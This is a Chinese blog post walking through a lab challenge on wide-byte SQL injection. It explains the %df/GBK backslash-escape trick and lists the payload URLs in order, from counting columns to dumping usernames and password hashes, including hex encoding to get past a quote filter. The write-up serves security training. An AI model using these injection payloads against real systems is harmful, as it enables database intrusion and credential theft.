360众测靶场题库之54-SQL注入漏洞测试(宽字节)

文章详细描述了一次SQL注入攻击的过程,包括测试单引号失败后的宽字节注入策略,通过异常报错判断列位置,逐步获取数据库名、表名、列名以及敏感数据,最终成功解密账号密码。
摘要由CSDN通过智能技术生成

开始注入,先测试单引号等情况,发现不可行,将id改成-1后页面消失,所以判断存在注入情况

之后用宽字节注入方式 %df,原理在于在GBK编码中,反斜杠的编码是%5c,在输入%df后,使得添加反斜杠后形成%df%5c,而%df%5c是繁体字“連”,单引号成功逃逸,爆出Mysql数据库的错误

http://219.153.49.228:48514/new_list.php?id=1 %df'

发现报错后,添加注释符,报错消失,判断是单引号闭合

http://219.153.49.228:48514/new_list.php?id=1 %df' %23

接下来使用order by语句判断列,发现6会报错,5可以,所以确定为5列

http://219.153.49.228:48514/new_list.php?id=1 %df' order by 5 %23

回显报错位为3和5

http://219.153.49.228:48514/new_list.php?id=-1 %df' union select 1,2,3,4,5 %23

获取数据库名为 mozhe_discuz_stormgroup

http://219.153.49.228:48514/new_list.php?id=-1 %df' union select 1,2,database(),4,5 %23

获取表名为 notice,stormgroup_member

http://219.153.49.228:48514/new_list.php?id=-1 %df' union select 1,2,database(),4,group_concat(table_name) from information_schema.tables where table_schema=database() %23

获取stormgroup_member表的列名,但是这里对单引号有过滤

http://219.153.49.228:48514/new_list.php?id=-1 %df' union select 1,2,database(),4,group_concat(column_name) from information_schema.columns where table_name='stormgroup_member' %23

通过16进制转换的方式来绕过过滤,所以先将stormgroup_member进行16进制编码得到0x73746f726d67726f75705f6d656d626572,之后获取列名为 name,password,status

http://219.153.49.228:48514/new_list.php?id=-1 %df' union select 1,2,database(),4,group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572 %23

随后获取name和password数据为 mozhe,3114b433dece9180717f2b7de56b28a3 和 mozhe,0959ad23e725f2a5e2acfa3344b479e4

http://219.153.49.228:48514/new_list.php?id=-1 %df' union select 1,2,database(),4,group_concat(name,0x7e,password) from mozhe_discuz_stormgroup.stormgroup_member %23

解密后获得账号密码,输入后获取key

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值